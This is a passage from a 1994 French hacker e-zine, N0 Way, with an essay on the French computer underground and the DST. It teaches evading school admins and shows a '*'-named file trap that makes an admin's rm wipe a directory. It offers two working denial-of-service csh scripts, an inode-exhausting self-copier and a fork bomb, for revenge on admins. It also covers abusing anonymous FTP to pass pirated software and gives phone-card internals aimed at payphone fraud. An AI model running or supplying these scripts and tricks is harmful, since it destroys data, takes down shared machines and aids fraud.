|
|
|||
|
======> Script done on Thu Sep 15 02:28:05 1994
|
|||
|
|
|||
|
Interressant n'est ce pas?
|
|||
|
|
|||
|
Comme ca on peut planquer des trucs sympa meme si il y a un petit "d" au tout
|
|||
|
debut de l'affichage, on peut quand meme les cacher la dedans car en g<>n<EFBFBD>ral
|
|||
|
les admins sont trop flemmards pour aller fouiller la dedans.
|
|||
|
Le nombre d'espace a la fin du fichier peut varier, un seul espace c'est tout
|
|||
|
de suite ce que l'on teste, mais si vous en mettez 42, c'est beaucoup moins
|
|||
|
<EFBFBD>vident.
|
|||
|
|
|||
|
L'int<6E>ret de cr<63>er des fichier commencant par "." est qu'ils ne sont pas list<73>s
|
|||
|
<EFBFBD> moins qu'on donne l'option "-a" a la commande "ls".
|
|||
|
|
|||
|
Vous pouvez aussi inclure des caracteres de controles dans le nom de vos
|
|||
|
fichier comme ^X ou ^T mais je d<>conseille car ca attire plutot l'attention.
|
|||
|
|
|||
|
Comment je planque mes images?
|
|||
|
=============================
|
|||
|
|
|||
|
Dans certaines ecoles, il y a des r<>gles pas si conne que ca qui
|
|||
|
interdisent les images sur leur r<>seau et donc des moulinettes tournent tous
|
|||
|
les jours pour traquer les .gif, .jpg etc...
|
|||
|
|
|||
|
Pour eviter de vous les faire detruire, vous pouvez les cacher dans des
|
|||
|
fichiers TAR.
|
|||
|
exemple:
|
|||
|
======> Script started on Thu Sep 15 02:49:50 1994
|
|||
|
|
|||
|
DaubeNet-tmp {101} ls -al
|
|||
|
total 778
|
|||
|
drwx------ 2 fred emprunte 512 Sep 15 02:49 .
|
|||
|
drwx------ 13 fred emprunte 512 Sep 15 02:27 ..
|
|||
|
-rw------- 1 fred emprunte 557056 Sep 15 02:49 hardfuck.gif
|
|||
|
-rw------- 1 fred emprunte 221184 Sep 15 02:48 susan.gif
|
|||
|
DaubeNet-tmp {102} tar cvf projet-math.tar hardfuck.gif susan.gif
|
|||
|
hardfuck.gif
|
|||
|
susan.gif
|
|||
|
tar: tar vol 1, 2 files, 0 bytes read, 788480 bytes written.
|
|||
|
DaubeNet-tmp {103} ll
|
|||
|
total 1560
|
|||
|
552 -rw------- 1 fred emprunte 557056 Sep 15 02:49 hardfuck.gif
|
|||
|
784 -rw------- 1 fred emprunte 788480 Sep 15 02:50 projet-math.tar
|
|||
|
224 -rw------- 1 fred emprunte 221184 Sep 15 02:48 susan.gif
|
|||
|
DaubeNet-tmp {106} rm hardfuck.gif
|
|||
|
DaubeNet-tmp {107} rm susan.gif
|
|||
|
DaubeNet-tmp {108} ll
|
|||
|
total 784
|
|||
|
784 -rw------- 1 fred emprunte 788480 Sep 15 02:50 projet-math.tar
|
|||
|
DaubeNet-tmp {109} compress projet-math.tar
|
|||
|
DaubeNet-tmp {110} ll
|
|||
|
total 5
|
|||
|
5 -rw------- 1 fred emprunte 4169 Sep 15 02:50 projet-math.tar.Z
|
|||
|
DaubeNet-tmp {111} exit
|
|||
|
|
|||
|
======> Script done on Thu Sep 15 02:51:17 1994
|
|||
|
|
|||
|
Si le programme de l'admin est assez vicieux pour checker l'interieur des
|
|||
|
fichiers compresses et de le detarer ensuite, vous n'avez qu'a faire cela et
|
|||
|
ensuite UUENCODER votre "projet-math.tar.Z" en un "projet-math.dat" ainsi tout
|
|||
|
le monde (y compris le programme) pensera que c'est un fichier donn<6E>e.
|
|||
|
|
|||
|
Crypter ses fichiers:
|
|||
|
====================
|
|||
|
Sous unix, il y a un petit utilitaire bien piegeur qui s'appelle crypt.
|
|||
|
Attention, si votre Admin n'est pas trop con, il aura un petit outil appel<65>
|
|||
|
gentiment CBW pour Crypt Breaker Workbench qui lui permettra de casser le code
|
|||
|
de crypt. Je vous d<>conseille donc d'utiliser crypt.
|
|||
|
(PS: cbw peut vous <20>tre utile, il est disponible en ftp anonymous un peu
|
|||
|
partout sur l'internet sous le nom: cbw.tar.Z).
|
|||
|
|
|||
|
Par contre, un package genial c'est PGP: un produit qui permet
|
|||
|
d'ampliquer assez simplement le cryptage RSA (ou plutot IDEA) qui semble t'il
|
|||
|
est une combinaison de DES et de RSA.
|
|||
|
|
|||
|
C'est vraiment un outil g<>nial qui vaudrait un article de N0 Way a lui tout
|
|||
|
seul.
|
|||
|
|
|||
|
Faire criser son admin:
|
|||
|
======================
|
|||
|
Vous savez certainnement que sous Unix, certains caracteres sont
|
|||
|
interpret<EFBFBD>s par le Shell avant d'executer la commande dans laquelle <20>tait le
|
|||
|
fameux caractere.
|
|||
|
Ce caractere c'est par exemple "*" qui va <20>tre remplac<61> par les noms de tous
|
|||
|
les fichiers du directory en question.
|
|||
|
Amusez vous a cr<63>er dans un directory hyper important de votre admin un fichier
|
|||
|
nomm<EFBFBD> "*".
|
|||
|
|
|||
|
Exemple:
|
|||
|
|
|||
|
======> Script started on Thu Sep 15 03:11:09 1994
|
|||
|
|
|||
|
DaubeNet-/home/root {101} ls -al
|
|||
|
total 778
|
|||
|
drwxrwxrwx 2 root wheel 512 Sep 15 03:11 .
|
|||
|
drwxr-xr-x 13 root wheel 512 Sep 15 02:27 ..
|
|||
|
-rw-r-xr-x 1 root wheel 557056 Sep 15 02:49 important.txt
|
|||
|
-rw-r-xr-x 1 root wheel 221184 Sep 15 02:48 whole-sources.c
|
|||
|
DaubeNet-/home/root {102} cat >\*
|
|||
|
^D
|
|||
|
DaubeNet-/home/root {103} ll
|
|||
|
total 776
|
|||
|
0 -rw-r-xr-x 1 fred emprunte 0 Sep 15 03:11 *
|
|||
|
552 -rw-r-xr-x 1 root wheel 557056 Sep 15 02:49 important.txt
|
|||
|
224 -rw-r-xr-x 1 root wheel 221184 Sep 15 02:48 whole-sources.c
|
|||
|
DaubeNet-/home/root {104} exit
|
|||
|
|
|||
|
======> Script done on Thu Sep 15 03:11:40 1994
|
|||
|
|
|||
|
L'admin (assez con pour laisser son directory en lecture / ecriture) a une
|
|||
|
jolie bombe a retardement qu'il va s'empresser d'allumer des qu'il se loggera.
|
|||
|
|
|||
|
======> Script started on Thu Sep 15 03:18:54 1994
|
|||
|
|
|||
|
DaubeNet-/home/root {101} ls -al
|
|||
|
total 778
|
|||
|
-rw-r-xr-x 1 fred emprunte 0 Sep 15 03:11 *
|
|||
|
drwxrwxrwx 2 root wheel 512 Sep 15 03:11 .
|
|||
|
drwxr-xr-x 13 root wheel 512 Sep 15 02:27 ..
|
|||
|
-rw------- 1 root wheel 557056 Sep 15 02:49 important.txt
|
|||
|
-rw------- 1 root wheel 221184 Sep 15 02:48 whole-sources.c
|
|||
|
DaubeNet-/home/root {102} rm *
|
|||
|
DaubeNet-/home/root {103} ll
|
|||
|
DaubeNet-/home/root {104} ls -al
|
|||
|
total 2
|
|||
|
drwxrwxrwx 2 root wheel 512 Sep 15 03:19 .
|
|||
|
drwxr-xr-x 13 root wheel 512 Sep 15 02:27 ..
|
|||
|
DaubeNet-/home/root {105} echo Arghhhhh
|
|||
|
Arghhhhh
|
|||
|
DaubeNet-/home/root {106} exit
|
|||
|
|
|||
|
======> Script done on Thu Sep 15 03:19:21 1994
|
|||
|
|
|||
|
VOila, c'est fini pour la partie locale...
|
|||
|
Maintenant, je vais vous expliquer comment vous servir des r<>pertoires
|
|||
|
incomings et autres pour vous transferer des fichier.
|
|||
|
|
|||
|
Le FTP anonyme:
|
|||
|
==============
|
|||
|
Sur FTP Anonyme, vous avez souvent un directory "/incoming" qui vous permet de
|
|||
|
d<EFBFBD>poser des fichiers pour l'admin.
|
|||
|
Un site bien configur<75> aura mis comme mode pour ce dir: rwxrwxr-t qui veut
|
|||
|
dire: rwx : lecture/ecriture/traversee possible pour l'owner
|
|||
|
rwx : meme chose pour le groupe
|
|||
|
-wt : acces en ecriture avec travers<72>e du directory possible mais sans
|
|||
|
possibilit<69> d'effacer le fichier d'un autre.
|
|||
|
|
|||
|
Un site mal configur<75> aura pour mode: rwxrwxrwx qui veut dire:
|
|||
|
lecture, ecriture et travers<72>e pour tout le monde.
|
|||
|
Donc vous pourrez vous cr<63>er par un
|
|||
|
ftp> mkdir ".. "
|
|||
|
un fichier secret et ensuite d<>poser les dernieres versions d'Excel ou le
|
|||
|
dernier N0 Way pour vos amis qui viendront les recuperer plus tard et les
|
|||
|
effacer!
|
|||
|
|
|||
|
Interressant n'est ce pas? Ainsi, hop, vous pouvez faire transiter anonymement
|
|||
|
des trucs sur Internet.
|
|||
|
|
|||
|
I-node muncher:
|
|||
|
==============
|
|||
|
Un admin vous a vraiment fait une crasse? Vous <20>tes vert et vous
|
|||
|
voulez un peu le faire chier...
|
|||
|
un "rm -fr /" ? C'est vraiment con car ca peut causer de sales probl<62>mes <20> des
|
|||
|
personnes qui n'ont rien fait.
|
|||
|
Ce qui est mieux c'est de faire un peu chier l'admin en lui bouffant tous ses
|
|||
|
Inodes. Un inode c'est le num<75>ro qui d<>signe un fichier dans le filesystem
|
|||
|
unix donc si vous les prenez tous, personne ne pourra plus creer de fichier
|
|||
|
m<EFBFBD>me si il reste plein de place sur le disque.
|
|||
|
Alors voila le shell script nw.sh:
|
|||
|
$ cat >nw.sh <<EOF
|
|||
|
#!/bin/csh
|
|||
|
umask 000
|
|||
|
mkdir N0way
|
|||
|
cp nw.sh N0way
|
|||
|
cd N0way
|
|||
|
chmod +x nw.sh
|
|||
|
./nw.sh &
|
|||
|
EOF
|
|||
|
$
|
|||
|
|
|||
|
Executez ce fichier et *kaboummm* le syst<73>me va commencer <20> s<>rieusement merder
|
|||
|
hehehehehe...
|
|||
|
Vous pouvez m<>me en lancer plusieurs.
|
|||
|
|
|||
|
Task muncher:
|
|||
|
============
|
|||
|
Vous pouvez faire la m<>me chose avec les processus si les quotas ne
|
|||
|
tournent pas. En faisant tourner un seul process qui a chaque fois forke 5
|
|||
|
fois et vous verrez que plus la machine va vite, plus votre programme investira
|
|||
|
rapidement l'ordinateur en question.
|
|||
|
$ cat >dontkill.sh <<EOF
|
|||
|
#!/bin/csh
|
|||
|
./dontkill.sh &
|
|||
|
./dontkill.sh &
|
|||
|
./dontkill.sh &
|
|||
|
./dontkill.sh &
|
|||
|
./dontkill.sh &
|
|||
|
EOF
|
|||
|
$
|
|||
|
|
|||
|
Voila, c'est le fion. Euh... la fin.
|
|||
|
J'espere que ce ++N-Phile vous aura <20>t<EFBFBD> bien utile et occupera longtemps votre
|
|||
|
admin. N'oubliez pas une chose,
|
|||
|
IL EXISTE QUAND MEME DES ADMINS COOLS ALORS, laissez ceux la tranquile. :))
|
|||
|
|
|||
|
The End.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
C'est fini.... y a rien en dessous...
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
STOP !!!! YA PLUS RIEN.
|
|||
|
<EOF>
|
|||
|
|
|||
|
|
|||
|
Non mais c'est dingue, Vous etes sourd ou quoi, je vous repete que c'est FINI!
|
|||
|
:)
|
|||
|
|
|||
|
|
|||
|
-%!% N0 Way %!%-
|
|||
|
|
|||
|
Volume I, Num<75>ro 3, Partie 3.8
|
|||
|
|
|||
|
|
|||
|
Voila, Neuralien m'a presse pour <20>crire ce petit texte veuillez ne pas tenir
|
|||
|
compte des fotes d'orthographes et autre stupidit<69>es du meme genre.
|
|||
|
[Bahh... fo tout le temps presser tout le monde. On me le fait bien hehe:
|
|||
|
"NeurAlien, depeche toi, c'est quand qu'il sort N0 Way 4?
|
|||
|
- Euh... bin attend mon pote, on a pas encore sorti le 3!!! :)" ++N]
|
|||
|
|
|||
|
|
|||
|
CARTES TELEPHONIQUES
|
|||
|
1/2
|
|||
|
Pour NOWAY
|
|||
|
PAR D. O'CONNELL
|
|||
|
|
|||
|
Depuis "l'invention" par le fumeux Roland Moreno en 1975 de la carte <20> puce
|
|||
|
les applications se sont multipli<6C>es. La plus connue <20>tant celle des
|
|||
|
t<EFBFBD>l<EFBFBD>phones <20> cartes, on va donc <20>tudier le mode de fonctionnement de ces
|
|||
|
cartes dans le but <20>vident d'en ameliorer le fonctionnement..
|
|||
|
|
|||
|
La realisation technique de la carte tient plus du bricolo que de l'invention
|
|||
|
g<EFBFBD>niale, le seul (et grand) m<>rite de Moreno a <20>t<EFBFBD> d'<27>tre un visionaire
|
|||
|
g<EFBFBD>nial.
|
|||
|
On peut r<>sumer le fonctionnement de la carte <20> une eprom <20> acces serie donc <20>
|
|||
|
priori rien de bien compliqu<71>, nost<73>l<EFBFBD>cartes francaises comportent une simple
|
|||
|
m<EFBFBD>moire de 256 bits, oui vous avez bien lu 32 octets!
|
|||
|
|
|||
|
La carte est s<>par<61>e en deux zones la premiere de 96 bits ets dites "Zone
|
|||
|
constructeur" la deuxieme etant la "zone de transaction", jusque l<> tout le
|
|||
|
mond suit ? pas de probl<62>me?
|
|||
|
Les deux zones sont en acces libre pour la lecture, vous pouvez donc voir ce
|
|||
|
qui y est <20>crit sans probleme. La zone transaction peut etre ecrite, mais on
|
|||
|
ne peut <20>crire que des 0 (technologie des eproms) ce qui revient <20> d<>biter des
|
|||
|
unit<EFBFBD>es, meme Regis c'est rendu compte que c'<27>tait pas vraiement interessant.
|
|||
|
La zone constructeur est elle proteg<65>e par un fusible qui grille apres la
|
|||
|
premiere programmation, donc on peut plus <20>crire meme des 0. OK ca va??
|
|||
|
|
|||
|
Voila la map memory d'une carte t<>l<EFBFBD>phonique:
|
|||
|
|
|||
|
Bytes Bits Binary Hexa
|
|||
|
|
|||
|
+-----------+-----+
|
|||
|
1 1 --> 8 | | | ---> Code personnalis<69>.
|
|||
|
+-----------+-----+
|
|||
|
2 9 --> 16 | 0000 0011 | $03 | ---> T<>l<EFBFBD>carte
|
|||
|
+-----------+-----+
|
|||
|
3 17 --> 24 | | |
|
|||
|
+-----------+-----+
|
|||
|
4 25 --> 32 | | |
|
|||
|
+-----------+-----+
|
|||
|
5 33 --> 40 | | |
|
|||
|
+-----------+-----+
|
|||
|
6 41 --> 48 | | |
|
|||
|
+-----------+-----+
|
|||
|
7 49 --> 56 | | |
|
|||
|
+-----------+-----+
|
|||
|
8 57 --> 64 | | |
|
|||
|
+-----------+-----+
|
|||
|
9 65 --> 72 | | |
|
|||
|
+-----------+-----+
|
|||
|
10 73 --> 80 | | |
|
|||
|
+-----------+-----+
|
|||
|
11 81 --> 88 | 0001 0000 | $10 |
|
|||
|
+-----------+-----+
|
|||
|
12 89 --> 96 | 0001 0011 | $13 | ---> 120 unit<69>s
|
|||
|
| 0000 0110 | $06 | ---> 50 unit<69>s
|
|||
|
| 0000 0101 | $05 | ---> 40 unit<69>s (plus utilis<69>)
|
|||
|
+-----------+-----+
|
|||
|
13-31 97 --> 248 | | | ---> Zone de transaction ou chaque
|
|||
|
| | | bit represente une unit<69>
|
|||
|
| | |
|
|||
|
| | |
|
|||
|
| | |
|
|||
|
| | |
|
|||
|
| | |
|
|||
|
+-----------+-----+
|
|||
|
32 249 --> 256 | 1111 1111 | $FF | ---> Carte vide
|
|||
|
+-----------+-----+
|
|||
|
|
|||
|
En voila assez pour la partie logicielle, on va voir comment on peu acceder
|
|||
|
aux donn<6E>es.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Afnor (Franco-Francais) ISO (Internatinnal)
|
|||
|
En haut <20> gauche Milieu Gauche
|
|||
|
(abandonn<6E> de puis peu)
|
|||
|
|
|||
|
-------------+------------- -------------+-------------
|
|||
|
| 8 | 4 | | 1 | 5 |
|
|||
|
| | | | | |
|
|||
|
+-------\ | /-------+ +-------\ | /-------+
|
|||
|
| 7 +----+----+ 3 | | 2 +----+ + 6 |
|
|||
|
| | | | | | | |
|
|||
|
+--------| |--------+ +--------| |--------+
|
|||
|
| 6 | | 2 | | 3 | | 7 |
|
|||
|
| + +----+ | | +----+----+ |
|
|||
|
+-------/ | \-------+ +-------/ | \-------+
|
|||
|
| 5 | 1 | | 4 | 8 |
|
|||
|
| | | | | |
|
|||
|
-------------+------------- -------------+-------------
|
|||
|
|
|||
|
|
|||
|
PINOUT: 1 : Vcc = 5V 5 : Gnd (0V)
|
|||
|
2 : R/W(Lire='1':Ecrire='0')6 : Vpp = 21V (Tension de prog)
|
|||
|
3 : Clock (Horloge) 7 : I/O (Entr<74>e/Sortie)
|
|||
|
4 : Reset 8 : Fusible
|
|||
|
|
|||
|
|
|||
|
- Time diagrams:
|
|||
|
|
|||
|
+21V _____________
|
|||
|
+5V____________________________________| |_________________ Vpp
|
|||
|
: :
|
|||
|
+5V ___________________:_____________:_________________ Reset
|
|||
|
0V ________________| : :
|
|||
|
: : :
|
|||
|
+5V ____ : ____ : ______:______
|
|||
|
0V ___| |_______:_____| |________:______| : |__________ Clock
|
|||
|
: : : : : : : : :
|
|||
|
+5V : : : : : :______:______: : _
|
|||
|
0V ___:____:_______:_____:____:________| : |______:__________ R/W
|
|||
|
: : : : : : : : :
|
|||
|
+5V : : :_____: :________: : : :__________
|
|||
|
0V XXXXXXXXXXXXXXXXX_____XXXXXX________XXXXXXXXXXXXXXXXXXXXXX__________ Out
|
|||
|
: : : : : :<-----><---->: :
|
|||
|
: : : : : :10 to 10 to :
|
|||
|
: : : : : :50 ms 50ms :
|
|||
|
Reset Bit 1 Bit2 Ecriture Bit 3
|
|||
|
|
|||
|
|
|||
|
Vous avez donc tous les <20>l<EFBFBD>ments en main pour comprendre le fonctionnement de
|
|||
|
la carte, dans un prochain num<75>ro, il y aura un lecteur/ecriveur de carte et
|
|||
|
peut etre un "Simulateur de carte t<>l<EFBFBD>phonique reprogrammable <20> volont<6E>".
|
|||
|
|
|||
|
Pour r<>pondre <20> vos questions voici l'extrait d'un petit dialogue qui a eu
|
|||
|
lieu il y a deja quelque temps chez FB apres un d<>tour au bar Le Terminus:
|
|||
|
|
|||
|
Si on peut ecrire sur la carte c'est super on peut rajouter des unit<69>s!
|
|||
|
ARGHH! On peut <20>crire que des zeros donc d<>duire des unit<69>s!
|
|||
|
|
|||
|
Comment on fait pour ecrire des '1'?
|
|||
|
Il faut effacer l'eprom aux UV
|
|||
|
|
|||
|
Ben on fait ca ! non?
|
|||
|
Ben la resine qu'il y a sur puce est anti UV
|
|||
|
|
|||
|
On enl<6E>ve la r<>sine!
|
|||
|
En admettant que tu puisses enlever la resine sans endommager le chip, tu
|
|||
|
efface TOUT y compris la zone constructeur, que tu ne peux re<72>crire puisque
|
|||
|
le fusible a <20>t<EFBFBD> grill<6C>!!!!
|
|||
|
|
|||
|
On remet le fusible!
|
|||
|
Bien sur avec tes petits doigts habiles tu recable une connextion de 5 <20>m
|
|||
|
ca y ait MD tu as trouv<75> le system :-(
|
|||
|
|
|||
|
Le moyen n'est pas l<>, il faut faire croire <20> la cabine qu'elle est en
|
|||
|
presence d'une vraie carte... Que pensez vous d'une RAM avec quelques compos
|
|||
|
logique autours??? Voila a vous de vous d<>brouiller j'ai donn<6E> l'id<69>e g<>n<EFBFBD>rale
|
|||
|
il ne vous manque plus que la r<>alisation! Rendez vous dans le prochain
|
|||
|
num<EFBFBD>ro......
|
|||
|
[Addendum de chieur de service, je me suis nomm<6D> NeurAlien, vous avez remarque
|
|||
|
que l'on est repass<73> du syst<73>me de tambour (vous savez: inserez la carte et
|
|||
|
rabatez le couvercle) <20> un syst<73>me normal sans tambour. Bien sur, le tambour
|
|||
|
servait <20> <20>viter que les trains de cables puissent etre faits. Alors ya des
|
|||
|
Ueber-Phreakers qui ont fait des fausses cartes avec des composants en CMS.
|
|||
|
Et donc comme tout tenait sur une carte, FT=bais<69> car plus de train de cables.
|
|||
|
Donc eux aussi ont rus<75>: Ils ont un syst<73>me genre reflectom<6F>tre qui si au lieu
|
|||
|
d'etre en contact direct avec la carte, il y a quelques centimetre de cable qui
|
|||
|
les menes jusqu'aux contacts normaux d'une vraie carte: ca foire, la carte est
|
|||
|
rejet<EFBFBD>e! Alors je sais pas comment ils ont fait ca mais en tout cas c'est
|
|||
|
assez chaud. hehe, je suis pas <20>lectronicien mais on m'a dit que ca se faisait
|
|||
|
facilement. ++NeurAlien]
|
|||
|
|
|||
|
Merci <20> Marc d'avoir passe quelques heures dans certains fichiers de config, <20>
|
|||
|
EFZ TEAM de faire vivre ce zine, et <20> XXXXX pour mon defunt acces INET.
|
|||
|
[je prot<6F>ge les innocents, pas de pseudos connus et identifiables ds N0 WAY]
|
|||
|
D. O'CONNELL A.K.A. HOPPY
|
|||
|
|
|||
|
-%!% N0 Way %!%-
|
|||
|
|
|||
|
Volume I, Num<75>ro 3, Partie 3.9
|
|||
|
|
|||
|
|
|||
|
Cet article est un article de CORE-DUMP, journal Underground Hacker jamais
|
|||
|
diffuse publiquement.
|
|||
|
PS: ca date, maintenant l'underground informatique est bien d<>velopp<70> mais non
|
|||
|
encore interconnect<63>.
|
|||
|
|
|||
|
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
|
|||
|
= CORE-DUMP | Volume I | Issue 2 | Phile 6 | [NeurAlien] 12/09/92 =
|
|||
|
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
|
|||
|
._ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ .
|
|||
|
/_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ /|
|
|||
|
:_:_:_:_:_:_:_:_:_:_:_:_:_:_:_:_: |
|
|||
|
:_: Pourquoi :_: |
|
|||
|
:_: L'Underground Informatique:_: |
|
|||
|
:_: est-il :_: |
|
|||
|
:_: sous d<>velopp<70>? :_: |
|
|||
|
:_: en France :_: |
|
|||
|
:_:_ _ _ _ _ _ _ _ _ _ _ _ _ _:_: |
|
|||
|
:_:_:_:_:_:_:_:_:_:_:_:_:_:_:_:_:/'
|
|||
|
|
|||
|
Par NeurAlien
|
|||
|
|
|||
|
|
|||
|
J'ai choisi de faire cet article sur la vie de l'Underground
|
|||
|
Informatique Francais apr<70>s avoir r<>fl<66>chi au fait qu'il se cr<63>ait parfois
|
|||
|
dans des endroits tr<74>s recul<75>s et tr<74>s peu ouverts du r<>seau, des petites
|
|||
|
"iles" o<> un petit groupe de hackers ou de phone phreaks se rencontrent, mais
|
|||
|
que jamais il n'y a eu d'underground organis<69> et qui dure dans le temps
|
|||
|
comparable <20> ceux form<72>s aux USA ou en Allemagne.
|
|||
|
|
|||
|
>Qu'est-ce que l'Underground:
|
|||
|
============================
|
|||
|
Le concept d'underground informatique est venu en premier avec le
|
|||
|
Chaos Computers Club de Hambourg qui a fait beaucoup de r<>flexions pouss<73>es
|
|||
|
sur les hackers et les phone phreaks.
|
|||
|
En fait, l'Underground n'est ni un serveur, ni un journal, ni un groupe
|
|||
|
comme les LODs ou le CCCH. L'Underground est un ensemble de relations et
|
|||
|
d'histoires qui se r<>p<EFBFBD>tent et se perp<72>tuent <20> travers des discussions et
|
|||
|
des journaux pour H/P et ainsi, cela forme un petit "monde" totalement
|
|||
|
virtuel avec ses propres r<>gles jamais <20>crites mais respect<63>es comme
|
|||
|
"Ne jamais effacer de donn<6E>e sur un syst<73>me d'information a part pour
|
|||
|
couvrir sa trace". (cf: article 4 du Phrack 22 par The Mentor)
|
|||
|
Aux USA, un vaste Underground H/P existe;form<72> de Phracks Inc, de Computer
|
|||
|
Underground Digest, de diff<66>rents groupes qui ont toujours <20>t<EFBFBD>s li<6C>s d'une
|
|||
|
mani<EFBFBD>re quelconque. Il y a toujours eu un contact entre les anciens "mate"
|
|||
|
(les meilleurs) qui se sont fait prendre ou qui se sont retir<69>s et les
|
|||
|
jeunes hackers et phone phreaks qui arrivaient dans l'Underground.
|
|||
|
Il y a toujours eu un souci de continuit<69> de la part de l'Underground aux
|
|||
|
USA: les anciens forment des nouveaux avant de s'en aller.
|
|||
|
Mais pour la France? On pourrait presque dire qu'il n'y a jamais
|
|||
|
eu d'ancien.
|
|||
|
|
|||
|
>Le probl<62>me de l'underground Francais:
|
|||
|
======================================
|
|||
|
L'Underground Francais n'a en fait jamais exist<73> en tant que monde
|
|||
|
durable. De multiples petits "ilots" comme NICK au sein de MCOM, les
|
|||
|
hackers de RIBOUREL, Les SLANS sur VMF/MOP, TeKila's Underground dans
|
|||
|
le club TELECOMS sur RTEL ou encore "le royaume t<>l<EFBFBD>matique" sur la section
|
|||
|
'PROBLEMES DE LIAISON SPECIALISE' du serveur de la DTRN ainsi que PIRATEL
|
|||
|
sur un serveur gratuit videotext.
|
|||
|
Tous ces micro-underground n'ont dur<75> que quelques mois tout au plus.
|
|||
|
Bien s<>r, vous me direz qu'il existe bien des serveur comme AATEL et PIRATE
|
|||
|
sur le r<>seau x25. Mais leur plus grand probl<62>me est le maillage organis<69>
|
|||
|
et m<>thodique que la DST a tiss<73> sur les r<>seaux Francais.
|
|||
|
Qu'est ce que la DST. C'est la Direction de la Surveillance du
|
|||
|
Territoire dont une grande partie tr<74>s bien <20>quip<69>e et tr<74>s bien organis<69>e
|
|||
|
s'occupe du piratage informatique.
|
|||
|
Gr<EFBFBD>ce <20> leur "r<>seau" d'informateur et de surveillance, ils sont capables de
|
|||
|
d<EFBFBD>tecter certaines activit<69>s tendancieuses sur le r<>seau T<>l<EFBFBD>tel, X25,
|
|||
|
ou m<>me RTC. (l'Internet est tr<74>s mal maitris<69>!! h<>h<EFBFBD>h<EFBFBD> !)
|
|||
|
Je vais vous raconter une anecdote qui illustre bien l'<27>tendue de leur
|
|||
|
pouvoir. Suite au piratage d'une grande boite d'informatique de France, un
|
|||
|
groupe de hacker a <20>t<EFBFBD> "track<63>" par la DST. Dans ce groupe, il y avait un
|
|||
|
certain "DIEU" (le pseudonyme), tristement c<>l<EFBFBD>bre par son irrespect envers
|
|||
|
tous les autres hackers. Ce dernier <20>tait recherch<63> activement et pourtant,
|
|||
|
personne de la DST n'arrivait <20> le prendre.
|
|||
|
Un jour, un connect<63> sur un petit micro-serveur RTC pris pour deconner le
|
|||
|
pseudo DIEU. Quelques jours plus tard, deux inspecteur d<>barquaient <20> la
|
|||
|
maison du SYSOP de ce micro-serveur pour savoir qui <20>tait ce fameux DIEU.
|
|||
|
Manque de pot pour la DST, ce DIEU en question n'<27>tait absolument pas le
|
|||
|
bon!
|
|||
|
(information suppl<70>mentaire: le vrai DIEU, le hacker, a quand m<>me <20>t<EFBFBD>
|
|||
|
retrouv<EFBFBD> au bout de 3 ou 4 mois d'enqu<71>tes intensives.)
|
|||
|
La DST a des relations partout et est r<>put<75>e pour tous savoir.
|
|||
|
Connaissez vous 1984 de George Orwell???? Vous connaissez alors BIG BROTHER.
|
|||
|
La DST, c'est un peu <20>a mais en moins fort... N<>anmoins, vous pouvez <20>tre
|
|||
|
sur que s'ils veulent savoir quelque chose, il seront au courant, <20> quelque
|
|||
|
prix que cela leur coute... Ce sont avec les RG (renseignements g<>n<EFBFBD>raux) les
|
|||
|
oreilles de l'<27>tat; <20> part que pour la DST, il y a eu des BRAS de rajout<75>s...
|
|||
|
Quand au "cerveaux", ils ne semblent pas <20>tre <20> la traine dans cet outils
|
|||
|
du pouvoir.
|
|||
|
On comprends donc mieux pourquoi les hackers sont vite arr<72>t<EFBFBD>s s'il
|
|||
|
y a pleinte de port<72>e.
|
|||
|
D<EFBFBD>s le d<>but, lors d'une affaire de piratage informatique, c'est la DST qui
|
|||
|
s'en occupe plus que la PJ! La DST fait alors un travail m<>thodique et
|
|||
|
complet d'audit pour traquer le hacker. Le hacker ensuite recoit une visite
|
|||
|
qui termine en g<>n<EFBFBD>ral l'enqu<71>te sur le hacker. L<>, les inspecteurs de la
|
|||
|
DST font "cracher" tout ce dont ils ont besoin au hacker.
|
|||
|
Un micro lors de l'interrogatoire est sans aucun doute possible install<6C>.
|
|||
|
Bien sur, les V (petit surnom pour la DST) ne se limitent pas <20> des questions
|
|||
|
uniquement sur l'enqu<71>te en cours... Ils essayent d'avoir toutes les infos
|
|||
|
possibles sur les autres hackers pour que cela leur facilite la tache s'ils
|
|||
|
doivent trouver d'autre hackers.
|
|||
|
Le mat<61>riel du hacker est ensuite saisi, et hop, ils disparaissent de votre
|
|||
|
vie, sans aucune autre trace qu'un grand manque au niveau mat<61>riel et une
|
|||
|
lourde menace si jamais on s'avisait de recommencer.
|
|||
|
Le conseil nous est aussi donn<6E> de ne pas remettre les pieds sur un serveur
|
|||
|
avant deux mois au moins.
|
|||
|
Apres la partie de la DST, si l'affaire <20> quelque chose <20> voir avec une
|
|||
|
fraude ou un quelconque gain d'argent, alors vous pouvez <20>tre s<>r d'avoir
|
|||
|
une visite de la part de la PJ qui ont des m<>thodes beaucoup moins calmes
|
|||
|
que la DST.
|
|||
|
S'il n'y a pas eu plainte par contre mais que selon eux vous devenez trop
|
|||
|
dangereux, alors ils font une descente chez vous, il vous font une grande
|
|||
|
frayeur et s'arrangent pour que vous rencardiez et informiez sur les
|
|||
|
hackers encore actifs pendant plusieurs mois, voir des ANNEES !!!
|
|||
|
|
|||
|
L'Underground est ainsi decim<69>, et il est bien s<>r impossible
|
|||
|
de pr<70>voir si vous <20>tes ou pas sur la "liste d'attente pour la casserole" de
|
|||
|
la DST. Ainsi, il n'y a pas de moyen de v<>ritablement "transmettre" son
|
|||
|
savoir en toute s<>curit<69>.
|
|||
|
|
|||
|
>Les moyens et les m<>thodes de la DST:
|
|||
|
=====================================
|
|||
|
La DST a vraiment beaucoup de moyens pour tracker un pirate.
|
|||
|
Par exemple, ils ont une <20>quipe de sp<73>cialiste en informatique et
|
|||
|
qui peuvent aider <20> tout moment les inspecteurs dans leur enquete.
|
|||
|
Ils savent pr<70>cisement comment agissent les hackers et connaissent
|
|||
|
en g<>n<EFBFBD>ral leurs habitudes ( chevaux de troie - crackers de mot de
|
|||
|
passe - worms - backdoors - passes & m<>thodes )
|
|||
|
